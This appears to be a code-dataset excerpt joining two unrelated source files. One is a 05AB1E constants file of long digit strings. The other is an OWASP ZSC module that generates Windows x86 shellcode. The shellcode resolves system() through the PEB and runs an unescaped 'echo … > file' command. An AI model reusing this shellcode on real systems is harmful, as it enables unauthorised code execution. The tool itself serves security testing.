"34532012475472326908754750707857765973254284445935304499207001"\
"53874894822655644222369636554419422544133821222547749753549462"\
"82768053333698328415613869236344335855386847111143049824839899"\
"80316545863828935379913053522283343013795337295401625762322808"\
"13849949187614414132293376710656349252881452823950620902235787"\
"68465011666009738275366040544694165342223905210831458584703552"\
"35221992827276057482126606529138553034554974455147034493948686"\
"42945965843102419078592368022456076393678416627051855517870290"\
"07355730462063969245330779578224594971042018804300018388142900"\
"17303945050734278701312446686009277858181104091151172937487362"\
"88787490746528556543474888683106411005102302087510776891878152"\
"62273525155037953244485778727761700196485370355516765520911933"\
"34376286628461984402629525218367852236747510880978150709897841"\
"08624588152266096355140187449583692691779904712072649490573726"\
"28600521140358123107600669951853612486274675637589622529911649"\
"06687650826173417848478933729505673900787861792535144062104536"\
"25064046372881569823231750059626108092195521115085930295565496"\
"53886261297233991462835847604862762702730973920200143224870758"\
"33735491524608560821032888297418390647886992327369136004883743"\
"61522351705843770554521081551336126214291181561530175888257359"\
"89250710887926212864139244330938379733386780613179523731526677"\
"82085802470143352700924380326695174211950767088432634644274912"\
"55890774686358216216604274131517021245858605623363149316464691"\
"94656249747174195835421860774871105733845843368993964591374060"\
"38215935224359475162623918868530782282176398323730618020424656"\
"47752794310479618972429953302979249748168405289379104494700459"\
"86499187272734541350810198388186467360939257193051196864560185"\
"78245021823106588943798652243205067737996619695547244058592241"\
"95300682045179537004347245176289356677050849021310773662575169"\
"33552746230294303120359626095342357439724965921101065781782610"\
"74531887480318743082357369919515634095716270099244492974910548"\
"85151965866474014822510633536794973714251022934188258511737199"\
"49911509758374613010550506419772153192935487537119163026203032"\
"58865852848019350922587577559742527658401172134232364808402714"\
"35636754204637518255252494432965704386138786590196573880286840"\
"89408767281671413703366173265012057865391578070308871426151907"\
"00149257611292767519309672845397116021360630309054224396632067"\
"32358279788933232440577919927848463333977773765590187057480682"\
"67834796562414610289950848739969297075043275302997287229732793"\
"44298864641272534816060377970729829917302929630869580199631241"\
"30493935049332541235507105446118259114111645453471032988104784"\
"06778013807713146540009938630648126661433085820681139583831916"\
"54555825942689576984142889374346708410794631893253910696395578"\
"70602124597489829356461356078898347241997947856436204209461341"\
"38761319886535235831299686226894860840845665560687695450127448"\
"63140505473535174687300980632278046891224682146080672762770840"\
"40226615548502400895289165711761743902033758487784291128962324"\
"05919187469104200584832614067733375102719565399469716251724831"\
"23063391932870798380074848572651612343493327335666447335855643"\
"23528088392434827876088616494328939916639921048830784777704804"\
"72849145630335326507002958890626591549850940797276756712979501"\
"09822947622896189159144152003228387877348513097908101912926722"\
"10377889805396415636236416915498576840839846886168437540706512"\
"03906250612810766379904790887967477806973847317047525344215639"\
"38720123880632368803701794930895490077633152306354837425681665"\
"36160664198003018828712376748189833024683637148830925928337590"\
"27894258806008728603885916884973069394802051122176635913825152"\
"27867009440694235512020156837777885182467002565170850924962374"\
"72681369428435006293881442998790530105621737545918267997321773"\
"02936892806521002539626880749809264345801165571588670044350397"\
"50532347828732736884086354000274067678382196352222653929093980"\
"36739136408289872201777674716811819585613372158311905468293608"\
"23697611345028175783020293484598292500089568263027126329586629"\
"14765314223335179309338795135709534637718368409244442209631933"\
"29562030557551734006797374061416210792363342380564685009203716"\
"15264255637185388957141641977238742261059666739699717316816941"\
"43509528319355641770566862221521799115135563970714331289365755"\
"84464832620120642433801695586269856102246064606933079384785881"\
"36740700059976970364901927332882613532936311240365069865216063"\
"98725026723808740339674439783025829689425689674186433613497947"\
"24552629142652284241924308338810358005378702399954217211368655"\
"27534136221169314069466951318692810257479598560514500502171591"\
"31775160995786555198188619321128211070944228724044248115340605"\
"89595835581523201218460582056359269930347885113206862662758877"\
"44603599665610843072569650056306448918759946659677284717153957"\
"61210818084154727314266174893313417463266235422207260014601270"\
"20693463952056444554329166298666078308906811879009081529506362"\
"78207561438881578135113469536630387841209234694286873083932043"\
"33387277549680521030282154432472338884521534372725012858974769"\
"46080831440412586818154004918777228786980185345453700652665564"\
"17091542952275670922221747411206272065662298980603289167206874"\
"65494824610869736722554740481288924247185432360575341167285075"\
"55205713115669795458488739874222813588798584078313506054829055"\
"48278529489112190538319562422871948475940785939804790109419407"\
"67176443903273071213588738504999363883820550168340277749607027"\
"84488028191222063688863681104356952930065219552826152699127163"\
"27738841899328713056346468822739828876319864570983630891778648"\
"08667618548568004767255267541474285102814580740315299219781455"\
"75684368111018531749816701642664788409026268282444825802753209"\
"54991510451851771654631180490456798571325752811791365627815811"\
"28881656228587603087597496384943527567661216895926148503078536"\
"04527450775295063101248034180458405943292607985443562009370809"\
"82152392037179067812199228049606973823874331262673030679594396"\
"95495718957721791559730058869364684557667609245090608820221223"\
"71925453671519183487258742391941089044411595993276004450655620"\
"46116465566548759424736925233695599303035509581762617623184956"\
"90649483967300203776387436934399982943020914707361894793269276"\
"44518656023955905370512897816345542332011497599489627842432748"\
"78803270141867695262118097500640514975588965029300486760520801"\
"49153788541390942453169171998762894127722112946456829486028149"\
"18156024967788794981377721622935943781100444806079767242927624"\
"51078415344642915084276452000204276947069804177583220909702029"\
"65734725158290463091035903784297757265172087724474095226716630"\
"00546971638794317119687348468873818665675127929857501636341131"\
"62753049901913564682380432997069577015078933772865803571279091"\
"76742080565549362541"
constant_e = "2.7182818284590452353602874713526624977572470936999595749669676"\
"772407663035354759457138217852516642742746639193200305992181741"\
"596629043572900334295260595630738132328627943490763233829880753"\
"952510190115738341879307021540891499348841675092447614606680822"\
"480016847741185374234544243710753907774499206955170276183860626"\
"331384583000752044933826560297606737113200709328709127443747047"\
"306969772093101416928368190255151086574637721112523897844250569"\
"369677078544996996794686445490598793163688923009879312773617821"\
"424999229576351482208269895193668033182528869398496465105820939"\
"398294887933203625094431173012381970684161403970198376793206832"\
"237646480429531180232878250981945581530175671736133206981125099"\
"181881593041690351598888519345807273866738589422879228499892086"\
"058257492796104841984443634632449684875602336248270419786232090"\
"216099023530436994184914631409343173814364054625315209618369088"\
"707016768396424378140592714563549061303107208510383750510115747"\
"041718986106873969655212671546889570350354021234078498193343210"\
"817012100562788023519303322474501585390473041995777709350366041"\
"997329725088687696640355570716226844716256079882651787134195124"\
"652010305921236677194325278675398558944896970964097545918569563"\
"023637016211204774272283648961342251644507818244235294863637214"\
"740238893441247963574370263755294448337998016125492278509257782"\
"620926226483262779333865664816277251640191059004916449982893150"\
"660472580277863186415519565324425869829469593080191529872117255"\
"347546396447910145904090586298496791287406870504895858671747985"\
"667757573205681288459205413340539220001137863009455606881667400"\
"698420558040336379537645203040243225661352783695117788386387443"\
"662532249850654995886234281899707733276171783928034946501434558"\
"970719425863987727547109629537415211151368350627526023264847287"\
"392076431005958411661205452970302364725492966693811513732275364"\
"098889031360205724817658511806303644281231496550704751025446501"\
"727211555194866850800368532281831521960037356252794495158284188"\
"947876108526398139559900673764829224437528718462457803619298197"\
"399147564488262603903381441823262515097482798777996437308997038"\
"867782271383605772978824125611907176639465070633045279546618550"\
"666618566470971134447401607046262156807174818778443714369882185"\
"967095910259686200235371858874856965220005031173439207321139080"\
"293634479727355955277349071783793421637012050054513263835440001"\
"632399149070547977805669785335804896690629511943247309958765523"\
"812859041383241160722602998330535370876138939639177957454016137"\
"236187893652605381558415871869255386061647798340254351284396129"\
"603529133259427949043372990857315802909586313826832914771163963"\
"709240031689458636060645845925126994655724839186564209752685082"\
"075442545993769170419777800853627309417101634349076964237222943"\
"236612557250881477922315197477806056967253801718077636034624592"\
"877846585065605078084421152969752189087401966090665180351650179"\
"504619501366585436632712549639908549144200014574760819302212066"\
"243300964127048943903971771951806990869986066365832322787093765"\
"226014929101151717763594460202324930028040186772391028809786660"\
"651183260043688508817157238669842242201024950551881694803221002"\
"154264946398128736776589276881635983124778865201411741109136011"\
"499507662907794364600585194199856016264790761532103872755712699"\
"518275687989302761761146162549356495903798045838182323368612016"\
"437365698467037858533052758333379399075216606923805336988795651"\
"728559388349989470741618155012539706464817194670834819721448889"\
"790676503795903669672494992545279033729636162658976039498576741"\
"973594410237443297093554779826296145914429364514286171585873397"\
"679189757121195618738578364475844842355558105002561149239151889"\
"099463428413936080383091662818811503715284967059741625628236092"\
"680751501777253874025642534708790891372917228286115159156837252"\
"163077225440633787593105982676094420326192428531701878177296023"\
"413060672136046000389661093647095141417185777014180606443636815"\
"644400533160877831431744408119494229755993140118886833148328027"\
"655383300469329011574414756313999722170380461709289457909627166"\
"260740718749975359212756084414737823303270330168237193648002173"\
"857349359475643341299430248502357322145978432826414216848787216"\
"336701061509424345698440187331281010794512722373788612605816566"\
"053714396127888732527373890392890506865324138062796025930387727"\
"977837928684093253658807339884572187460210053114833513238500478"\
"716937621800490479559795929059165547050577751430817511269898518"\
"408718564026035305583737832422924185625644255022672155980274012"\
"179719280471396006891638286652770097527670697770364392602243728"\
"184088325184877047263844037953016690546593746161932384036389313"\
"364327137688841026811219891275223056256756254701725086349765367"\
"886059667527408686274079128565769963137897530346606166698042182"\
"772456053066077389962421834085988207186468262321508028828635974"\
"839654358856685503773131296587975810501214916207656769950659715"\
"447634703208532156036748286083786568030730626576334697742956346"\
"371670939719306087696349532884683361303882943104080029687386911"\
"066666146800015121143442256023874474325250769387077775193299942"\
"372772112588436087158348356269616619805725266122067975406210620"\
"064988291845439530152998209250300549825704339055357016865312052"\
"495614857249257386206917403695213533732531666345466588597286659"\
"511364413703313936721185695539521084584072443238355860631068069"\
"492485123263269951460359603729725319836842336390463213671011619"\
"821711150282801604488058802382031981493096369596735832742024988"\
"456849412738605664913525267060462344505492275811517093149218795"\
"271800194096886698683703730220047531433818109270803001720593553"\
"520700706072233999463990571311587099635777359027196285061146514"\
"375262095653467132900259943976631145459026858989791158370934193"\
"044115512192011716488056694593813118384376562062784631049034629"\
"950029458341164824114969758326011800731699437393506966295712410"\
"732391387417549230718624545432220395527352952402459038057445028"\
"224688628533654221381572213116328811205214648980518009202471939"\
"710555390113943316681515828843687606961102505171007392762385553"\
"862725535388309606716446623709226468096712540618695021431762116"\
"814009759528149390722260111268115310838731761732323526360583817"\
"151034595736538223534992935822836851007810884634349983518404451"\
"042701893819942434100905753762577675711180900881641833192019626"\
"341628816652137471732547772778348877436651882875215668571950637"\
"936565390389449366421764003121527870222366463635755503565576948"\
"865495002708539236171055021311474137441061344455441921013361729"\
"628569489919336918472947858072915608851039678195942983318648075"\
"083679551496636448965592948187851784038773326247051945050419847"\
"420141839477312028158868457072905440575106012852580565947030468"\
"634459265255213700806875200959345360731622611872817392807462309"\
"685367823106097921599360019946237993434210687813497346959246469"\
"525062469586169091785739765951993929939955675427146549104568607"\
"209901260681870498417807917392407194599632306025470790177452751"\
"186809982284730860766536866855516467702911336827563107223346726"\
"137054907953658345386371962358563126183871567741187385277229225"\
"474337378569553845624680101390572787101651296663676445187246565"\
"730402443684140814488732957847348490003019477888020460324660842"\
"753518483649591950828883232065221281041904480472479492913422849"\
"197002260131043006241071797150279343326340799596053144605323048"\
"528972917659876016667811937932372453857209607582277178483361613"\
"826128962261181294559274627671377944875867536575448614076119311"\
"595851265575973457301533364263076798544338576171533346232527057"\
"005303988289499034259566232975782488735029259166825894456894655"\
"926584547626945287805165017206747854178879822768065366506419109"\
"343452887833862172615626958265447820567298775642632532159429441"\
"039943217000090542650763095588465895171709147607437136893319469"\
"909819045012903070995662266203031826493657336984195557769637876"\
"491885286568660760056602560544571133728684020557441603083705231"\
"242587223438854123179481388550075689381124935386318635287083799"\
"456926199817945233640874295911807474534195514203517261842008455"\
"917084568236820089773945584267921427347756087964427920270831215"\
"156406341341617166448069815483764491573900121217041547872591998"\
"438253649505147713793991472052195290793961376211072384942906163"\
"760459623125350606853765142311534966568371511660422079639446662"\
"163255157729070978473156278277598788136491951257483328793771571"\
"590910648416426783099497236744201758622694021594079244805412553"\
"043131799269673915754241929660731239376354213923061787675395871"\
"436104089409966089471418340698362993675362621545247298464213752"\
"910798843813060955526227208375186298370667872244301957937937860"\
"210725427728907173285487437435578196651171661833088112912024520"\
"048682200072344035025448202834254187884653602591506445271657700"\
"445210977355858976226554849416217149895323834216001140629507184"\
"042778925855274303522139683567901807640604213830730877446017084"\
"688272261177180842664333651780002171903449234264266292261456004"\
"373838683355553434530042648184739892156270860956506293404052649"\
"324426144566592129122564889356965500915430642613425266847259491"\
"314239398845432486327461842846655985332312210466259890141712103"\
"460842716166190012571958707932175696985440133976220967494541854"\
"711844643394699016269835160784892451405894094639526780735457970"\
"307051163682519487701189764002827648414160587206184185297189154"\
"196882532893091496653457535714273184820163846448324990378860690"\
"807270932767312758196656394114896171683298045513972950668760474"\
"915420428429993541025829113502241690769431668574242522509026939"\
"348148564513030699251995904363840284292674125734224477655841778"\
"617173726546208549829449894678735092958165263207225899236876845"\
"017823038096567883112289305809140572610865884845873101658151167"\
"333276748870148291674197015125597825727074064318086014281490241"\
"678047232759768426963393577354293018673943971638861176420900406"\
"663398856841681003872389214483176070116684503887212364367043314"\
"911557332801829779887365909166596124020217785588548761761619893"\
"079438005666336488436508914480557103976521469602766258359905198"\
"04230017946553679"
zero_byte_code = """Ig0Q "check if the input is not empty"\\
"If the input is empty, read the docs file and print as a quick-ref
------------------------------------------------------------------"\\
i “curr=__file__;curr=curr[:-9]+"docs/info.txt";f=open(curr, "r");print(f.read())“.e q }}}}}}}
"If the input is not empty, do random stuff with it
--------------------------------------------------"\\
¹d©
"1: Create a snake using the canvas
-------------------------------"\\
i
"Not sure what to do now with the input, so I'll just make a snake:",¶?¶?
6¹×S'#4202.Λ,
}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
®_i
"Not sure what to do now with the input, so I'll just make a snake:",¶?¶?
5¹g×S¹2464.Λ,
}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}"""
| Emigna/05AB1E | lib/constants.py | Python | mit | 146,313 | 0.000055 |
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
from core import stack
def create_file(create_command):
return '''
xor %ecx,%ecx
mov %fs:0x30(%ecx),%eax
mov 0xc(%eax),%eax
mov 0x14(%eax),%esi
lods %ds:(%esi),%eax
xchg %eax,%esi
lods %ds:(%esi),%eax
mov 0x10(%eax),%ebx
mov 0x3c(%ebx),%edx
add %ebx,%edx
mov 0x78(%edx),%edx
add %ebx,%edx
mov 0x20(%edx),%esi
add %ebx,%esi
xor %ecx,%ecx
inc %ecx
lods %ds:(%esi),%eax
add %ebx,%eax
cmpl $0x50746547,(%eax)
jne 23 <.text+0x23>
cmpl $0x41636f72,0x4(%eax)
jne 23 <.text+0x23>
cmpl $0x65726464,0x8(%eax)
jne 23 <.text+0x23>
mov 0x24(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,2),%cx
dec %ecx
mov 0x1c(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,4),%edx
add %ebx,%edx
xor %esi,%esi
mov %edx,%esi
xor %ecx,%ecx
push %ecx
push $0x41797261
push $0x7262694c
push $0x64616f4c
push %esp
push %ebx
call *%edx
xor %ecx,%ecx
mov $0x6c6c,%cx
push %ecx
push $0x642e7472
push $0x6376736d
push %esp
call *%eax
xor %edi,%edi
mov %eax,%edi
xor %edx,%edx
push %edx
mov $0x6d65,%dx
push %edx
push $0x74737973
mov %esp,%ecx
push %ecx
push %edi
xor %edx,%edx
mov %esi,%edx
call *%edx
xor %ecx,%ecx
{0}
push %esp
call *%eax
xor %edx,%edx
push %edx
push $0x74697865
mov %esp,%ecx
push %ecx
push %edi
call *%esi
xor %ecx,%ecx
push %ecx
call *%eax
'''.format(create_command)
def run(data):
file_to_create = data[0]
file_content = data[1]
return create_file(stack.generate("echo " + file_content + ">" +
file_to_create, "%ecx", "string"))
| Ali-Razmjoo/OWASP-ZSC | lib/generator/windows_x86/create_file.py | Python | gpl-3.0 | 1,892 | 0.000529 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.